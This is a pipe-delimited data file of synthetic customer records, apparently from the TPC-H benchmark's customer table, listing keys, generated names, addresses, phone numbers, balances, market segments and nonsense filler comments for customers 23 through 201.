23|Customer#000000023|OdY W13N7Be3OC5MpgfmcYss0Wn6TKT|3|13-312-472-8245|3332.02|HOUSEHOLD|deposits. special deposits cajole slyly. fluffily special deposits about the furiously 24|Customer#000000024|HXAFgIAyjxtdqwimt13Y3OZO 4xeLe7U8PqG|13|23-127-851-8031|9255.67|MACHINERY|into beans. fluffily final ideas haggle fluffily 25|Customer#000000025|Hp8GyFQgGHFYSilH5tBfe|12|22-603-468-3533|7133.70|FURNITURE|y. accounts sleep ruthlessly according to the regular theodolites. unusual instructions sleep. ironic, final 26|Customer#000000026|8ljrc5ZeMl7UciP|22|32-363-455-4837|5182.05|AUTOMOBILE|c requests use furiously ironic requests. slyly ironic dependencies us 27|Customer#000000027|IS8GIyxpBrLpMT0u7|3|13-137-193-2709|5679.84|BUILDING| about the carefully ironic pinto beans. accoun 28|Customer#000000028|iVyg0daQ,Tha8x2WPWA9m2529m|8|18-774-241-1462|1007.18|FURNITURE| along the regular deposits. furiously final pac 29|Customer#000000029|sJ5adtfyAkCK63df2,vF25zyQMVYE34uh|0|10-773-203-7342|7618.27|FURNITURE|its after the carefully final platelets x-ray against 30|Customer#000000030|nJDsELGAavU63Jl0c5NKsKfL8rIJQQkQnYL2QJY|1|11-764-165-5076|9321.01|BUILDING|lithely final requests. furiously unusual account 31|Customer#000000031|LUACbO0viaAv6eXOAebryDB xjVst|23|33-197-837-7094|5236.89|HOUSEHOLD|s use among the blithely pending depo 32|Customer#000000032|jD2xZzi UmId,DCtNBLXKj9q0Tlp2iQ6ZcO3J|15|25-430-914-2194|3471.53|BUILDING|cial ideas. final, furious requests across the e 33|Customer#000000033|qFSlMuLucBmx9xnn5ib2csWUweg D|17|27-375-391-1280|-78.56|AUTOMOBILE|s. slyly regular accounts are furiously. carefully pending requests 34|Customer#000000034|Q6G9wZ6dnczmtOx509xgE,M2KV|15|25-344-968-5422|8589.70|HOUSEHOLD|nder against the even, pending accounts. even 35|Customer#000000035|TEjWGE4nBzJL2|17|27-566-888-7431|1228.24|HOUSEHOLD|requests. special, express requests nag slyly furiousl 36|Customer#000000036|3TvCzjuPzpJ0,DdJ8kW5U|21|31-704-669-5769|4987.27|BUILDING|haggle. enticing, quiet platelets grow quickly bold sheaves. carefully regular acc 37|Customer#000000037|7EV4Pwh,3SboctTWt|8|18-385-235-7162|-917.75|FURNITURE|ilent packages are carefully among the deposits. furiousl 38|Customer#000000038|a5Ee5e9568R8RLP 2ap7|12|22-306-880-7212|6345.11|HOUSEHOLD|lar excuses. closely even asymptotes cajole blithely excuses. carefully silent pinto beans sleep carefully fin 39|Customer#000000039|nnbRg,Pvy33dfkorYE FdeZ60|2|12-387-467-6509|6264.31|AUTOMOBILE|tions. slyly silent excuses slee 40|Customer#000000040|gOnGWAyhSV1ofv|3|13-652-915-8939|1335.30|BUILDING|rges impress after the slyly ironic courts. foxes are. blithely 41|Customer#000000041|IM9mzmyoxeBmvNw8lA7G3Ydska2nkZF|10|20-917-711-4011|270.95|HOUSEHOLD|ly regular accounts hang bold, silent packages. unusual foxes haggle slyly above the special, final depo 42|Customer#000000042|ziSrvyyBke|5|15-416-330-4175|8727.01|BUILDING|ssly according to the pinto beans: carefully special requests across the even, pending accounts wake special 43|Customer#000000043|ouSbjHk8lh5fKX3zGso3ZSIj9Aa3PoaFd|19|29-316-665-2897|9904.28|MACHINERY|ial requests: carefully pending foxes detect quickly. carefully final courts cajole quickly. carefully 44|Customer#000000044|Oi,dOSPwDu4jo4x,,P85E0dmhZGvNtBwi|16|26-190-260-5375|7315.94|AUTOMOBILE|r requests around the unusual, bold a 45|Customer#000000045|4v3OcpFgoOmMG,CbnF,4mdC|9|19-715-298-9917|9983.38|AUTOMOBILE|nto beans haggle slyly alongside of t 46|Customer#000000046|eaTXWWm10L9|6|16-357-681-2007|5744.59|AUTOMOBILE|ctions. accounts sleep furiously even requests. regular, regular accounts cajole blithely around the final pa 47|Customer#000000047|b0UgocSqEW5 gdVbhNT|2|12-427-271-9466|274.58|BUILDING|ions. express, ironic instructions sleep furiously ironic ideas. furi 48|Customer#000000048|0UU iPhBupFvemNB|0|10-508-348-5882|3792.50|BUILDING|re fluffily pending foxes. pending, bold platelets sleep slyly. even platelets cajo 49|Customer#000000049|cNgAeX7Fqrdf7HQN9EwjUa4nxT,68L FKAxzl|10|20-908-631-4424|4573.94|FURNITURE|nusual foxes! fluffily pending packages maintain to the regular 50|Customer#000000050|9SzDYlkzxByyJ1QeTI o|6|16-658-112-3221|4266.13|MACHINERY|ts. furiously ironic accounts cajole furiously slyly ironic dinos. 51|Customer#000000051|uR,wEaiTvo4|12|22-344-885-4251|855.87|FURNITURE|eposits. furiously regular requests integrate carefully packages. furious 52|Customer#000000052|7 QOqGqqSy9jfV51BC71jcHJSD0|11|21-186-284-5998|5630.28|HOUSEHOLD|ic platelets use evenly even accounts. stealthy theodolites cajole furiou 53|Customer#000000053|HnaxHzTfFTZs8MuCpJyTbZ47Cm4wFOOgib|15|25-168-852-5363|4113.64|HOUSEHOLD|ar accounts are. even foxes are blithely. fluffily pending deposits boost 54|Customer#000000054|,k4vf 5vECGWFy,hosTE,|4|14-776-370-4745|868.90|AUTOMOBILE|sual, silent accounts. furiously express accounts cajole special deposits. final, final accounts use furi 55|Customer#000000055|zIRBR4KNEl HzaiV3a i9n6elrxzDEh8r8pDom|10|20-180-440-8525|4572.11|MACHINERY|ully unusual packages wake bravely bold packages. unusual requests boost deposits! blithely ironic packages ab 56|Customer#000000056|BJYZYJQk4yD5B|10|20-895-685-6920|6530.86|FURNITURE|. notornis wake carefully. carefully fluffy requests are furiously even accounts. slyly expre 57|Customer#000000057|97XYbsuOPRXPWU|21|31-835-306-1650|4151.93|AUTOMOBILE|ove the carefully special packages. even, unusual deposits sleep slyly pend 58|Customer#000000058|g9ap7Dk1Sv9fcXEWjpMYpBZIRUohi T|13|23-244-493-2508|6478.46|HOUSEHOLD|ideas. ironic ideas affix furiously express, final instructions. regular excuses use quickly e 59|Customer#000000059|zLOCP0wh92OtBihgspOGl4|1|11-355-584-3112|3458.60|MACHINERY|ously final packages haggle blithely after the express deposits. furiou 60|Customer#000000060|FyodhjwMChsZmUz7Jz0H|12|22-480-575-5866|2741.87|MACHINERY|latelets. blithely unusual courts boost furiously about the packages. blithely final instruct 61|Customer#000000061|9kndve4EAJxhg3veF BfXr7AqOsT39o gtqjaYE|17|27-626-559-8599|1536.24|FURNITURE|egular packages shall have to impress along the 62|Customer#000000062|upJK2Dnw13,|7|17-361-978-7059|595.61|MACHINERY|kly special dolphins. pinto beans are slyly. quickly regular accounts are furiously a 63|Customer#000000063|IXRSpVWWZraKII|21|31-952-552-9584|9331.13|AUTOMOBILE|ithely even accounts detect slyly above the fluffily ir 64|Customer#000000064|MbCeGY20kaKK3oalJD,OT|3|13-558-731-7204|-646.64|BUILDING|structions after the quietly ironic theodolites cajole be 65|Customer#000000065|RGT yzQ0y4l0H90P783LG4U95bXQFDRXbWa1sl,X|23|33-733-623-5267|8795.16|AUTOMOBILE|y final foxes serve carefully. theodolites are carefully. pending i 66|Customer#000000066|XbsEqXH1ETbJYYtA1A|22|32-213-373-5094|242.77|HOUSEHOLD|le slyly accounts. carefully silent packages benea 67|Customer#000000067|rfG0cOgtr5W8 xILkwp9fpCS8|9|19-403-114-4356|8166.59|MACHINERY|indle furiously final, even theodo 68|Customer#000000068|o8AibcCRkXvQFh8hF,7o|12|22-918-832-2411|6853.37|HOUSEHOLD| pending pinto beans impress realms. final dependencies 69|Customer#000000069|Ltx17nO9Wwhtdbe9QZVxNgP98V7xW97uvSH1prEw|9|19-225-978-5670|1709.28|HOUSEHOLD|thely final ideas around the quickly final dependencies affix carefully quickly final theodolites. final accounts c 70|Customer#000000070|mFowIuhnHjp2GjCiYYavkW kUwOjIaTCQ|22|32-828-107-2832|4867.52|FURNITURE|fter the special asymptotes. ideas after the unusual frets cajole quickly regular pinto be 71|Customer#000000071|TlGalgdXWBmMV,6agLyWYDyIz9MKzcY8gl,w6t1B|7|17-710-812-5403|-611.19|HOUSEHOLD|g courts across the regular, final pinto beans are blithely pending ac 72|Customer#000000072|putjlmskxE,zs,HqeIA9Wqu7dhgH5BVCwDwHHcf|2|12-759-144-9689|-362.86|FURNITURE|ithely final foxes sleep always quickly bold accounts. final wat 73|Customer#000000073|8IhIxreu4Ug6tt5mog4|0|10-473-439-3214|4288.50|BUILDING|usual, unusual packages sleep busily along the furiou 74|Customer#000000074|IkJHCA3ZThF7qL7VKcrU nRLl,kylf |4|14-199-862-7209|2764.43|MACHINERY|onic accounts. blithely slow packages would haggle carefully. qui 75|Customer#000000075|Dh 6jZ,cwxWLKQfRKkiGrzv6pm|18|28-247-803-9025|6684.10|AUTOMOBILE| instructions cajole even, even deposits. finally bold deposits use above the even pains. slyl 76|Customer#000000076|m3sbCvjMOHyaOofH,e UkGPtqc4|0|10-349-718-3044|5745.33|FURNITURE|pecial deposits. ironic ideas boost blithely according to the closely ironic theodolites! furiously final deposits n 77|Customer#000000077|4tAE5KdMFGD4byHtXF92vx|17|27-269-357-4674|1738.87|BUILDING|uffily silent requests. carefully ironic asymptotes among the ironic hockey players are carefully bli 78|Customer#000000078|HBOta,ZNqpg3U2cSL0kbrftkPwzX|9|19-960-700-9191|7136.97|FURNITURE|ests. blithely bold pinto beans h 79|Customer#000000079|n5hH2ftkVRwW8idtD,BmM2|15|25-147-850-4166|5121.28|MACHINERY|es. packages haggle furiously. regular, special requests poach after the quickly express ideas. blithely pending re 80|Customer#000000080|K,vtXp8qYB |0|10-267-172-7101|7383.53|FURNITURE|tect among the dependencies. bold accounts engage closely even pinto beans. ca 81|Customer#000000081|SH6lPA7JiiNC6dNTrR|20|30-165-277-3269|2023.71|BUILDING|r packages. fluffily ironic requests cajole fluffily. ironically regular theodolit 82|Customer#000000082|zhG3EZbap4c992Gj3bK,3Ne,Xn|18|28-159-442-5305|9468.34|AUTOMOBILE|s wake. bravely regular accounts are furiously. regula 83|Customer#000000083|HnhTNB5xpnSF20JBH4Ycs6psVnkC3RDf|22|32-817-154-4122|6463.51|BUILDING|ccording to the quickly bold warhorses. final, regular foxes integrate carefully. bold packages nag blithely ev 84|Customer#000000084|lpXz6Fwr9945rnbtMc8PlueilS1WmASr CB|11|21-546-818-3802|5174.71|FURNITURE|ly blithe foxes. special asymptotes haggle blithely against the furiously regular depo 85|Customer#000000085|siRerlDwiolhYR 8FgksoezycLj|5|15-745-585-8219|3386.64|FURNITURE|ronic ideas use above the slowly pendin 86|Customer#000000086|US6EGGHXbTTXPL9SBsxQJsuvy|0|10-677-951-2353|3306.32|HOUSEHOLD|quests. pending dugouts are carefully aroun 87|Customer#000000087|hgGhHVSWQl 6jZ6Ev|23|33-869-884-7053|6327.54|FURNITURE|hely ironic requests integrate according to the ironic accounts. slyly regular pla 88|Customer#000000088|wtkjBN9eyrFuENSMmMFlJ3e7jE5KXcg|16|26-516-273-2566|8031.44|AUTOMOBILE|s are quickly above the quickly ironic instructions; even requests about the carefully final deposi 89|Customer#000000089|dtR, y9JQWUO6FoJExyp8whOU|14|24-394-451-5404|1530.76|FURNITURE|counts are slyly beyond the slyly final accounts. quickly final ideas wake. r 90|Customer#000000090|QxCzH7VxxYUWwfL7|16|26-603-491-1238|7354.23|BUILDING|sly across the furiously even 91|Customer#000000091|S8OMYFrpHwoNHaGBeuS6E 6zhHGZiprw1b7 q|8|18-239-400-3677|4643.14|AUTOMOBILE|onic accounts. fluffily silent pinto beans boost blithely according to the fluffily exp 92|Customer#000000092|obP PULk2LH LqNF,K9hcbNqnLAkJVsl5xqSrY,|2|12-446-416-8471|1182.91|MACHINERY|. pinto beans hang slyly final deposits. ac 93|Customer#000000093|EHXBr2QGdh|7|17-359-388-5266|2182.52|MACHINERY|press deposits. carefully regular platelets r 94|Customer#000000094|IfVNIN9KtkScJ9dUjK3Pg5gY1aFeaXewwf|9|19-953-499-8833|5500.11|HOUSEHOLD|latelets across the bold, final requests sleep according to the fluffily bold accounts. unusual deposits amon 95|Customer#000000095|EU0xvmWvOmUUn5J,2z85DQyG7QCJ9Xq7|15|25-923-255-2929|5327.38|MACHINERY|ithely. ruthlessly final requests wake slyly alongside of the furiously silent pinto beans. even the 96|Customer#000000096|vWLOrmXhRR|8|18-422-845-1202|6323.92|AUTOMOBILE|press requests believe furiously. carefully final instructions snooze carefully. 97|Customer#000000097|OApyejbhJG,0Iw3j rd1M|17|27-588-919-5638|2164.48|AUTOMOBILE|haggle slyly. bold, special ideas are blithely above the thinly bold theo 98|Customer#000000098|7yiheXNSpuEAwbswDW|12|22-885-845-6889|-551.37|BUILDING|ages. furiously pending accounts are quickly carefully final foxes: busily pe 99|Customer#000000099|szsrOiPtCHVS97Lt|15|25-515-237-9232|4088.65|HOUSEHOLD|cajole slyly about the regular theodolites! furiously bold requests nag along the pending, regular packages. somas 100|Customer#000000100|fptUABXcmkC5Wx|20|30-749-445-4907|9889.89|FURNITURE|was furiously fluffily quiet deposits. silent, pending requests boost against 101|Customer#000000101|sMmL2rNeHDltovSm Y|2|12-514-298-3699|7470.96|MACHINERY| sleep. pending packages detect slyly ironic pack 102|Customer#000000102|UAtflJ06 fn9zBfKjInkQZlWtqaA|19|29-324-978-8538|8462.17|BUILDING|ously regular dependencies nag among the furiously express dinos. blithely final 103|Customer#000000103|8KIsQX4LJ7QMsj6DrtFtXu0nUEdV,8a|9|19-216-107-2107|2757.45|BUILDING|furiously pending notornis boost slyly around the blithely ironic ideas? final, even instructions cajole fl 104|Customer#000000104|9mcCK L7rt0SwiYtrbO88DiZS7U d7M|10|20-966-284-8065|-588.38|FURNITURE|rate carefully slyly special pla 105|Customer#000000105|4iSJe4L SPjg7kJj98Yz3z0B|10|20-793-553-6417|9091.82|MACHINERY|l pains cajole even accounts. quietly final instructi 106|Customer#000000106|xGCOEAUjUNG|1|11-751-989-4627|3288.42|MACHINERY|lose slyly. ironic accounts along the evenly regular theodolites wake about the special, final gifts. 107|Customer#000000107|Zwg64UZ,q7GRqo3zm7P1tZIRshBDz|15|25-336-529-9919|2514.15|AUTOMOBILE|counts cajole slyly. regular requests wake. furiously regular deposits about the blithely final fo 108|Customer#000000108|GPoeEvpKo1|5|15-908-619-7526|2259.38|BUILDING|refully ironic deposits sleep. regular, unusual requests wake slyly 109|Customer#000000109|OOOkYBgCMzgMQXUmkocoLb56rfrdWp2NE2c|16|26-992-422-8153|-716.10|BUILDING|es. fluffily final dependencies sleep along the blithely even pinto beans. final deposits haggle furiously furiou 110|Customer#000000110|mymPfgphaYXNYtk|10|20-893-536-2069|7462.99|AUTOMOBILE|nto beans cajole around the even, final deposits. quickly bold packages according to the furiously regular dept 111|Customer#000000111|CBSbPyOWRorloj2TBvrK9qp9tHBs|22|32-582-283-7528|6505.26|MACHINERY|ly unusual instructions detect fluffily special deposits-- theodolites nag carefully during the ironic dependencies 112|Customer#000000112|RcfgG3bO7QeCnfjqJT1|19|29-233-262-8382|2953.35|FURNITURE|rmanently unusual multipliers. blithely ruthless deposits are furiously along the 113|Customer#000000113|eaOl5UBXIvdY57rglaIzqvfPD,MYfK|12|22-302-930-4756|2912.00|BUILDING|usly regular theodolites boost furiously doggedly pending instructio 114|Customer#000000114|xAt 5f5AlFIU|14|24-805-212-7646|1027.46|FURNITURE|der the carefully express theodolites are after the packages. packages are. bli 115|Customer#000000115|0WFt1IXENmUT2BgbsB0ShVKJZt0HCBCbFl0aHc|8|18-971-699-1843|7508.92|HOUSEHOLD|sits haggle above the carefully ironic theodolite 116|Customer#000000116|yCuVxIgsZ3,qyK2rloThy3u|16|26-632-309-5792|8403.99|BUILDING|as. quickly final sauternes haggle slyly carefully even packages. brave, ironic pinto beans are above the furious 117|Customer#000000117|uNhM,PzsRA3S,5Y Ge5Npuhi|24|34-403-631-3505|3950.83|FURNITURE|affix. instructions are furiously sl 118|Customer#000000118|OVnFuHygK9wx3xpg8|18|28-639-943-7051|3582.37|AUTOMOBILE|uick packages alongside of the furiously final deposits haggle above the fluffily even foxes. blithely dogged dep 119|Customer#000000119|M1ETOIecuvH8DtM0Y0nryXfW|7|17-697-919-8406|3930.35|FURNITURE|express ideas. blithely ironic foxes thrash. special acco 120|Customer#000000120|zBNna00AEInqyO1|12|22-291-534-1571|363.75|MACHINERY| quickly. slyly ironic requests cajole blithely furiously final dependen 121|Customer#000000121|tv nCR2YKupGN73mQudO|17|27-411-990-2959|6428.32|BUILDING|uriously stealthy ideas. carefully final courts use carefully 122|Customer#000000122|yp5slqoNd26lAENZW3a67wSfXA6hTF|3|13-702-694-4520|7865.46|HOUSEHOLD| the special packages hinder blithely around the permanent requests. bold depos 123|Customer#000000123|YsOnaaER8MkvK5cpf4VSlq|5|15-817-151-1168|5897.83|BUILDING|ependencies. regular, ironic requests are fluffily regu 124|Customer#000000124|aTbyVAW5tCd,v09O|18|28-183-750-7809|1842.49|AUTOMOBILE|le fluffily even dependencies. quietly s 125|Customer#000000125|,wSZXdVR xxIIfm9s8ITyLl3kgjT6UC07GY0Y|19|29-261-996-3120|-234.12|FURNITURE|x-ray finally after the packages? regular requests c 126|Customer#000000126|ha4EHmbx3kg DYCsP6DFeUOmavtQlHhcfaqr|22|32-755-914-7592|1001.39|HOUSEHOLD|s about the even instructions boost carefully furiously ironic pearls. ruthless, 127|Customer#000000127|Xyge4DX2rXKxXyye1Z47LeLVEYMLf4Bfcj|21|31-101-672-2951|9280.71|MACHINERY|ic, unusual theodolites nod silently after the final, ironic instructions: pending r 128|Customer#000000128|AmKUMlJf2NRHcKGmKjLS|4|14-280-874-8044|-986.96|HOUSEHOLD|ing packages integrate across the slyly unusual dugouts. blithely silent ideas sublate carefully. blithely expr 129|Customer#000000129|q7m7rbMM0BpaCdmxloCgBDRCleXsXkdD8kf|7|17-415-148-7416|9127.27|HOUSEHOLD| unusual deposits boost carefully furiously silent ideas. pending accounts cajole slyly across 130|Customer#000000130|RKPx2OfZy0Vn 8wGWZ7F2EAvmMORl1k8iH|9|19-190-993-9281|5073.58|HOUSEHOLD|ix slowly. express packages along the furiously ironic requests integrate daringly deposits. fur 131|Customer#000000131|jyN6lAjb1FtH10rMC,XzlWyCBrg75|11|21-840-210-3572|8595.53|HOUSEHOLD|jole special packages. furiously final dependencies about the furiously speci 132|Customer#000000132|QM5YabAsTLp9|4|14-692-150-9717|162.57|HOUSEHOLD|uickly carefully special theodolites. carefully regular requests against the blithely unusual instructions 133|Customer#000000133|IMCuXdpIvdkYO92kgDGuyHgojcUs88p|17|27-408-997-8430|2314.67|AUTOMOBILE|t packages. express pinto beans are blithely along the unusual, even theodolites. silent packages use fu 134|Customer#000000134|sUiZ78QCkTQPICKpA9OBzkUp2FM|11|21-200-159-5932|4608.90|BUILDING|yly fluffy foxes boost final ideas. b 135|Customer#000000135|oZK,oC0 fdEpqUML|19|29-399-293-6241|8732.91|FURNITURE| the slyly final accounts. deposits cajole carefully. carefully sly packag 136|Customer#000000136|QoLsJ0v5C1IQbh,DS1|7|17-501-210-4726|-842.39|FURNITURE|ackages sleep ironic, final courts. even requests above the blithely bold requests g 137|Customer#000000137|cdW91p92rlAEHgJafqYyxf1Q|16|26-777-409-5654|7838.30|HOUSEHOLD|carefully regular theodolites use. silent dolphins cajo 138|Customer#000000138|5uyLAeY7HIGZqtu66Yn08f|5|15-394-860-4589|430.59|MACHINERY|ts doze on the busy ideas. regular 139|Customer#000000139|3ElvBwudHKL02732YexGVFVt |9|19-140-352-1403|7897.78|MACHINERY|nstructions. quickly ironic ideas are carefully. bold, 140|Customer#000000140|XRqEPiKgcETII,iOLDZp5jA|4|14-273-885-6505|9963.15|MACHINERY|ies detect slyly ironic accounts. slyly ironic theodolites hag 141|Customer#000000141|5IW,WROVnikc3l7DwiUDGQNGsLBGOL6Dc0|1|11-936-295-6204|6706.14|FURNITURE|packages nag furiously. carefully unusual accounts snooze according to the fluffily regular pinto beans. slyly spec 142|Customer#000000142|AnJ5lxtLjioClr2khl9pb8NLxG2,|9|19-407-425-2584|2209.81|AUTOMOBILE|. even, express theodolites upo 143|Customer#000000143|681r22uL452zqk 8By7I9o9enQfx0|16|26-314-406-7725|2186.50|MACHINERY|across the blithely unusual requests haggle theodo 144|Customer#000000144|VxYZ3ebhgbltnetaGjNC8qCccjYU05 fePLOno8y|1|11-717-379-4478|6417.31|MACHINERY|ges. slyly regular accounts are slyly. bold, idle reque 145|Customer#000000145|kQjHmt2kcec cy3hfMh969u|13|23-562-444-8454|9748.93|HOUSEHOLD|ests? express, express instructions use. blithely fina 146|Customer#000000146|GdxkdXG9u7iyI1,,y5tq4ZyrcEy|3|13-835-723-3223|3328.68|FURNITURE|ffily regular dinos are slyly unusual requests. slyly specia 147|Customer#000000147|6VvIwbVdmcsMzuu,C84GtBWPaipGfi7DV|18|28-803-187-4335|8071.40|AUTOMOBILE|ress packages above the blithely regular packages sleep fluffily blithely ironic accounts. 148|Customer#000000148|BhSPlEWGvIJyT9swk vCWE|11|21-562-498-6636|2135.60|HOUSEHOLD|ing to the carefully ironic requests. carefully regular dependencies about the theodolites wake furious 149|Customer#000000149|3byTHCp2mNLPigUrrq|19|29-797-439-6760|8959.65|AUTOMOBILE|al instructions haggle against the slyly bold w 150|Customer#000000150|zeoGShTjCwGPplOWFkLURrh41O0AZ8dwNEEN4 |18|28-328-564-7630|3849.48|MACHINERY|ole blithely among the furiously pending packages. furiously bold ideas wake fluffily ironic idea 151|Customer#000000151|LlyEtNEXT6kkZ,kGP46H|19|29-433-197-6339|5187.02|HOUSEHOLD|regular dugouts: blithely even dolphins cajole furiously carefull 152|Customer#000000152|PDrllSkScKLh4lr19gmUZnK|8|18-585-850-3926|1215.18|BUILDING|ously ironic accounts. furiously even accounts accord 153|Customer#000000153|kDzx11sIjjWJm1|6|16-342-316-2815|5454.26|HOUSEHOLD|promise carefully. unusual deposits x-ray. carefully regular tithes u 154|Customer#000000154|2LAlU fDHkOqbXjHHDqw1mJQNC|19|29-522-835-6914|4695.12|FURNITURE|nic packages haggle blithely across the 155|Customer#000000155|l,sSphiStMgdrxpxi|0|10-566-282-8705|5902.85|AUTOMOBILE| sleep ironic, bold requests. regular packages on the quiet dependencies 156|Customer#000000156|5OS0edX2Y6B1cf9wJNuOQWgrrZccXk9|9|19-723-913-3943|9302.95|AUTOMOBILE| regular foxes above the theodolites haggle 157|Customer#000000157|HGEouzCcFrNd nBAdsCRjsMxKOvYZdbwA7he5w9v|15|25-207-442-1556|9768.73|BUILDING| pinto beans against the carefully bold requests wake quickly alongside of the final accounts. accounts 158|Customer#000000158|2HaYxi0J1620aoI1CdFyrW,rWOy|10|20-383-680-1329|6160.95|AUTOMOBILE|ecoys. fluffily quick requests use flu 159|Customer#000000159|KotsdDO6EHnysVu922s6pjZpG,vlT|10|20-888-668-2668|2060.06|HOUSEHOLD|cingly express somas haggle above the theodolites. pinto beans use special theodolites. theodolites sleep 160|Customer#000000160|5soVQ3dOCRBWBS|13|23-428-666-4806|4363.17|MACHINERY|olites. silently ironic accounts cajole furious 161|Customer#000000161|2oRkx,NtjFUh|7|17-805-718-2449|3714.06|MACHINERY|ptotes nag carefully instructions. silent accounts are. furiously even accounts alongside 162|Customer#000000162|JE398sXZt2QuKXfJd7poNpyQFLFtth|8|18-131-101-2267|6268.99|MACHINERY|accounts along the doggedly special asymptotes boost blithely during the quickly regular theodolites. slyly 163|Customer#000000163|OgrGcOnm4whd0f|21|31-863-349-4121|2948.61|FURNITURE| nag furiously furiously final requests. slyly s 164|Customer#000000164|YDW51PBWLXLnbQlKC|4|14-565-638-9768|208.45|HOUSEHOLD|ironic, special pinto beans. ironic 165|Customer#000000165|8pc6kwBmwBdEnfVP53aqL9DM4LymC4|0|10-927-209-5601|3349.92|HOUSEHOLD| requests. final ideas cajole quickly at the special, ironic acco 166|Customer#000000166|15HWGtwoP77EJfd95HxtMSTZUelV8NOKne2|10|20-320-530-5920|2042.21|FURNITURE|the packages. blithely final packages are furiously unusual asymptotes. regular frets promise carefully u 167|Customer#000000167|QNc2eOlRIzL6jpthwgDuB866uCIUPiOX|5|15-288-395-5501|1468.09|AUTOMOBILE|espite the ironic excuses. furiously final deposits wake slyly. slyly ex 168|Customer#000000168|GDcL5qU86P8,oaTwVBCLE6asM8rlxpE,211uziU|12|22-354-984-5361|-808.56|FURNITURE|blithely final accounts sleep quickly along the regular ideas. furiously sly foxes nag across the 169|Customer#000000169|NjhmHa7xrcjE|18|28-362-499-3728|4483.83|FURNITURE|fully unusual pinto beans. blithely express asymptotes lose carefully regular instructions? accounts b 170|Customer#000000170|5QmxmYubNhn6HAgLwTvphevM3OmpZTGsM|15|25-879-984-9818|7687.89|BUILDING| regular requests. carefully regu 171|Customer#000000171|RIhjJCrth89EU7xRSvN|7|17-513-603-7451|2379.91|MACHINERY|ly furiously final requests. slyly final requests wake silently pending, silent accounts. exp 172|Customer#000000172|KwgdKUL1G2WacsMNF50yX|22|32-178-964-1847|1134.40|MACHINERY|losely regular, unusual instructions. 173|Customer#000000173|Aue7KVz,FinSHpov Vk5ed,wSQ2BRSioJ0|9|19-443-196-8008|845.84|BUILDING|s pinto beans use thinly slyly regular packages. instructions print along the s 174|Customer#000000174|R5 fCPMSeDXtUpp5Ax|23|33-845-455-8799|1944.73|FURNITURE|oldly even requests haggle quickly blithely ironic accounts. idly final foxes doze slyly pending dep 175|Customer#000000175|8YK1ZyTqoY3wMWnExl4itPMLL793GpEZb6T|10|20-427-617-9922|1975.35|FURNITURE|ly final platelets are final pinto b 176|Customer#000000176|9hBepY2uz88HlCqToOLgeU770u81FeL|13|23-432-942-8830|-375.76|FURNITURE|uriously. final requests sleep ironic packages. quickly 177|Customer#000000177|6wzEKPyZE9dmBCJZ8e7x7fiiK,k|1|11-917-786-9955|7457.50|BUILDING|nal dolphins: blithely bold gifts wake slyly afte 178|Customer#000000178|p HUSDg8Cgan4Fj8Drvcdz4gi4dSqV0a7n 0ag|21|31-436-268-6327|2272.50|FURNITURE|unts. blithely regular dependencies kindle pending deposits. quietly express deposits wake above the Tiresias-- ex 179|Customer#000000179|djez3CWg0nnCiu60jsF|4|14-703-953-2987|-43.08|MACHINERY|st furiously. idly regular instructions wake fluffily slyl 180|Customer#000000180|DSGW3RFoYJE opVw,Y3wGCGcNULZi|13|23-678-802-2105|-92.58|FURNITURE|lar accounts sublate above the slyly final 181|Customer#000000181|YNviWd WrRkZvSw1OxIewBq|9|19-653-305-8440|3929.96|FURNITURE|final requests cajole furiously acro 182|Customer#000000182|tdwvgepG316CCTHtMaF8Q|3|13-199-211-9023|4810.22|AUTOMOBILE|quickly against the blithely even deposits; epitaphs unwind quickly along the carefully regular excuses. furio 183|Customer#000000183|aMAB2QSb8 86MAx|22|32-771-279-8154|4419.89|HOUSEHOLD|sual accounts across the slyl 184|Customer#000000184|uoOpBuRr42f1WIqnVYAhxbAA9bkK6HUGpOt|21|31-739-340-5476|170.46|AUTOMOBILE|hely according to the furiously unusual accounts. furiously bold platele 185|Customer#000000185|iHXzQgienOQ|5|15-760-572-8760|2788.76|BUILDING|t the ironic accounts. fluffily regular requests wake slyly ironic pinto beans. slyly unusu 186|Customer#000000186|BeVr6MzaobBENXRBC8pmOmkByMJI|3|13-518-743-2576|8737.50|HOUSEHOLD|e slyly final dependencies. unusual instructions against the carefully pending instructions boost quickly 187|Customer#000000187|OIlgR6oIRXV5g63q5YGudCjRD8kpod2p|4|14-716-294-6674|-774.22|FURNITURE|r deposits. carefully silent packages after the fluffily even instructio 188|Customer#000000188|58Srs6gEEoD3ZfwgXDM1OayRiaSY6K9YsveWwV|5|15-613-528-7811|9533.37|BUILDING|st slyly special platelets. bold, 189|Customer#000000189|r51HSq Rg8wQgF1CBfG1Vbye3GK|22|32-980-348-1114|-594.05|MACHINERY|sly express patterns. ideas on the regular d 190|Customer#000000190|F2X,GhSqLz8k u0gWsirsraFaEDEo6vIGtOTaO1T|11|21-730-373-8193|1657.46|AUTOMOBILE|uickly-- fluffily pending instructions boo 191|Customer#000000191|P1eCXsPWkv2y6ENQv|16|26-811-707-6869|2945.16|BUILDING|o beans hinder slyly bold accounts. 192|Customer#000000192|rDmB2c9d1BJQ y6R9jTx86YI77D|10|20-750-712-2481|8239.96|MACHINERY|ely unusual packages are fluffily 193|Customer#000000193|dUT4dtsPTZ6ZpkWLc,KGJCHY6JDJgPFH4|23|33-182-978-6287|8024.55|MACHINERY|y even theodolites. final foxes print along the final pinto beans. theodoli 194|Customer#000000194|mksKhdWuQ1pjbc4yffHp8rRmLOMcJ|16|26-597-636-3003|6696.49|HOUSEHOLD|quickly across the fluffily dogged requests. regular platelets around the ironic, even requests cajole quickl 195|Customer#000000195|WiqQD8hscyKekjMcSBA7AX 0AbxvBV|22|32-757-684-6845|4873.91|AUTOMOBILE| should detect blithely. quickly even packages above the deposits wak 196|Customer#000000196|68RstNo6a2B|18|28-135-177-2472|7760.33|FURNITURE|accounts wake. express instructions according to the s 197|Customer#000000197|UeVqssepNuXmtZ38D|1|11-107-312-6585|9860.22|AUTOMOBILE|ickly final accounts cajole. furiously re 198|Customer#000000198|,7fcZHIUn,fUaQtK8U,Q8|1|11-237-758-6141|3824.76|AUTOMOBILE|tions. slyly ironic waters wa 199|Customer#000000199|lBU3xll,a7e9TYm3 UyjDPCVMvnHKpq,9HW1X|4|14-136-924-5232|7654.31|FURNITURE|fully busy pinto beans. packages cajole around the express, bold packages! quickly ironic tithes 200|Customer#000000200|x1 H5c66DUgH2pgNTJhw6eZKgrAz|16|26-472-302-4189|9967.60|BUILDING|e after the ironic, even realms. fluffily regular packages doze-- courts haggle carefully! blithely 201|Customer#000000201|yWLtmd5usyjsCvyL1QJsBorC|2|12-759-183-9859|4614.40|MACHINERY| blithely even packages sleep carefully 